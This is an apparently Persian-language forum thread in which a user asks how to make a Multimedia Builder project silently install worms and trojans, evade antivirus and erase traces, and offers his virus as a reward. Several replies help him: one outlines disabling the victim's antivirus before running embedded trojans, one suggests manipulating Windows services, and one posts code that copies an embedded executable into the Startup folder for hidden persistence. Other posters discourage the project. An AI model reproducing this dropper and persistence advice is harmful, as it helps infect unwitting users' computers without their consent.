هر كي كمك كنه يه نسخه از ويروسم رو براش مي فرستم

mojyjoon

Banned
بچه ها من يه مولتي مديا درست كردم كه صفحه اول ( لودينگ ) بالا مياد چند تا فونت نصب مي كنه و بعد نيز چندتا كرم تراوا اما اين كرم ها اجرا نمي شن و پيغامي به اين معني مي دهند كه فايل ويروس در تمپ ويندوز پيدا نميشه حالا من چي كار كنم كه اين فايل ها بدون نياز به رفتن بر روي تمپ اجرا بشه يا اينكه اول يه جايي روي هارد كپي بشه بدون اينكه كاربر بفهمه و لعد اجرا بشه و بعد فايل هايي كه من نوشتم يا همون سندر ها پاك شوند در ضمن اين ويروس ها رو ويروس يابهاي مك افي و نورتون نيز پيدا نمي كنه ............... اين كه برنامه و فونت بدون اينكه كاربر بفهمد نصب شود را من در سورس صفحه نوشتم اما فونت نصب مي شود ولي ويروس نه ................ براي اجراي ويروس من از درون سوزس هاي آماده برنامه run را انتخاب كردم و حتي يك بار نيز با extraining file امتحان كردم..........................................راهنماييي كنيييد لللطططفاا

smd7m

Member
Virus no ..

mojyjoon عزيز
سلام
هدف از كمكي كه به شما مي شه يادگيري مالتي مديا بيلدره و نه اينكه امنيت ساير دوستان رو به خطر بياندازيد ..
از نمونه هاي زير در پروژه خود استفاده كنيد ...

sample.jpg

اين هم نمونه اي کامل جهت پاسخ به سوالات شما ...
http://www.smd7m.persiangig.com/other/misc.cab

موفق باشيد
محمد

mojyjoon

Banned
مرسي آقا محمد ، اما هدف من از ارائه ويروس به كاربران فقط اين بود كه به خاطر زحمتي كه كشيدن و اطلاعاتي كه به من دادند خسته نباشيدي بگوييم

mohsensemsarpour

کاربر فعال
ویروس چیز خوبیست برای یادگیری اکشن نویسی چون قوی ترین افراد آنها را می نویسند ولی ضعیف ترین افراد از آن برای منافع خود استفاده می کنند .

ali abedian

Banned
سلام

از اونجا که mmb تمام فایلهای embedded رو در هنگام لود شدن تخلیه می کنه پس تروجانهای شما هم تخلیه می شن و بلافاصله ویروسیابها پیداشون می کنن.. برای همین شما باید تروجانها را به طور جداگانه توی یه پروژه دیگه کامپایل کنی و بعدش بری دستوری رو که ویروس یاب رو روی سیستم قربانی غیرفعال می کنه {با عرض معذرت! اینو دیگه بهت نمیگم} اجرا کنی و بعد از غیر فعال کردن ویروس یاب ، فایل exe ای رو که توش تروجانهای embed شده هستن اجرا کنی و با دستورات مشابهی که smd7m به آن اشاره کرد تروجانها رو فعال کنی.(((البته اینهم خیلی جواب نمیده .. چون باید یه کاری کنی که سیستم قربانی توی استارت بعدیش ویروس یابش غیرفعال شده باشه .. برای همین من یه سوال مطرح کردم که خودم جوابش رو نمی دونم .. اگه دوس داشتی می تونی بری روی فهرستها سوال رو پیدا کنی و پاسخهای داده شده از طرف بچه ها رو بررسی کنی)))

سوال؟؟ >>>> چگونه می توان یک پروژه کامپایل شده mmb را قبل از تمام برنامه ها در هنگام استارت ویندوز اجرا کرد که تمام دستوراتش روی سیستم اجرا بشه؟

من هم بهت می گم دنبال این چیزا نباش.. چون چاه کن همیشه ته چاهه.. منظورم اینه: به جای اینکه یکی رو قربانی کنی ، خودت قربانی یکی دیگه میشی!!

وری گود

Saman

مدیر انجمن مولتی مدیا بیلدر
سلام
برای اینکه بتونی یک پنجره ی فعال و ببندی نیاز به پلاگین MiscY داری.

تا بعد...

silvercover

کاربر متخصص
برای اینکه بتونی برنامت رو بیش از سایرین اجرا کنی باید سرویس های ویندوز رو دست کاری کنی که از طریق CommandLine امکان پذیره. باقیش به عهده خودت...

marmmaarr

New Member
به نظر من اگر میخواهی فایل بدون اطلاع کاربر اجرا بشه شاید از راه کپی کردن اون فایل توی استارتاپ بتونی این کار رو انجام بدی.
من چیزی از کرم ها نمیدونم ولی اگر از پوشه ی استارتاپ اجرا میشن میتونی از کد زیر استفاده کنی
این طوری کاربر پس اجرای برنامه شما و خروج از آن که 100% یا کامپیوتر رو خاموش میکنه یا ریست که در هر حال پس از راه اندازی مجدد رایانه کرم ها اجرا و بدلیل اجرا غیر قابل حذف میباشند البته ایده های زیادی برای مقابله با اخراج فایل های کپی شده در استارتاپ وجود داره ولی من میگم شاید از راه مخفی کردن اطلاعات کپی شده در استارتاپ این امر میسر بشه و کاربر فایل های مورد نظر رو توی استارتاپ پیدا نکنه و ... :
این کد یک مثال برای کپی فایلی با نام H.marz در پوشه ی استارتاپ میباشد.

کد:
serwinDrive$=<[SIZE=2][COLOR=#0000ff]Windows[/COLOR][/SIZE][SIZE=2]>[/SIZE]
[SIZE=2][COLOR=#008000]** Find windows drive[/COLOR][/SIZE]
[SIZE=2]ReturnDrive$=[/SIZE][SIZE=2][COLOR=#0000ff]ExtractDrive[/COLOR][/SIZE][SIZE=2](userwinDrive$)[/SIZE]
[SIZE=2][COLOR=#008000]** addres for save exe file[/COLOR][/SIZE]
[SIZE=2]startup$=ReturnDrive$+[/SIZE][SIZE=2][COLOR=#800000]'\Documents and Settings\All Users\Start Menu\Programs\Startup\H.marz.exe'[/COLOR][/SIZE]
[SIZE=2]App_path$=[/SIZE][SIZE=2][COLOR=#800000]'<Embedded>\H.marz.exe'[/COLOR][/SIZE]
[B][SIZE=2][COLOR=#000080]SysCommand[/COLOR][/SIZE][/B][SIZE=2]("CopyFile","App_path$,startup$")[/SIZE]

آخرین ویرایش:

marmmaarr

New Member
البته گفتم راه های زیادی برای مقابله با اخراج فایل مورد نظر ما از استارتاپ توسط کاربر وجود داره و شاید هم راه مخفی کردن فایل ها زیاد جواب نده اما شاید بتونه تا مدتی کاربر رو سر کار بزاره . پیشنهاد میکنم خودتون برید دنبال سایر راه ها تا با حذف فایل هایتان در استارتاپ مقابله کنید... من اگر بلد هم باشم بیش از این نمیگم ...
موفق باشید...:wink:

Silver Soft

کاربر متخصص مولتی مدیا بیلدر
دوست عزیز ویروس نویسی با Mmb به هیچ وجه عاقلان نیست من هر چی دلت بخواد ویروس با این Mmb نوشتم ولی به درد نمیخوره چون سرعت کامپایلر و اجرای برنامه های ساخته شده با Mmb پایین هستش و تا بیاد ویروس کارش رو شروع کنه یه قرن گذشته و طرف هزار تا کار میتونه بکنه ...

splinter cell

Well-Known Member
البته گفتم راه های زیادی برای مقابله با اخراج فایل مورد نظر ما از استارتاپ توسط کاربر وجود داره و شاید هم راه مخفی کردن فایل ها زیاد جواب نده اما شاید بتونه تا مدتی کاربر رو سر کار بزاره . پیشنهاد میکنم خودتون برید دنبال سایر راه ها تا با حذف فایل هایتان در استارتاپ مقابله کنید... من اگر بلد هم باشم بیش از این نمیگم ...
موفق باشید...
عزیز دلم این دوستمون در سال 2005 یک سئوال رو پرسید و حالا شما بعد از 3 سال تصمیم گرفتید جواب ایشون رو بدین و این کار شما ....!!!!!
خواهشاً رعایت کنید و پست های فسیل شده رو خاک برداری نکنید.ارادتمند شما و همه دوستان تازه وارد هستیم.

marmmaarr

New Member
عذر میخوام باید به تاریخش نگاهی می انداختم.اما گفتم چون اول لیسته شاید تازه باشه.معذرت میخوام چون تازه وارد هستم این تجربیات خیلی کمکم میکنه.پس خواهشمندم همیشه تجربییاتتون رو در اختیارم بگذارید تا من هم مثل خودتون اینقدر فروتن بشم .

جدیدترین ارسال ها

بالا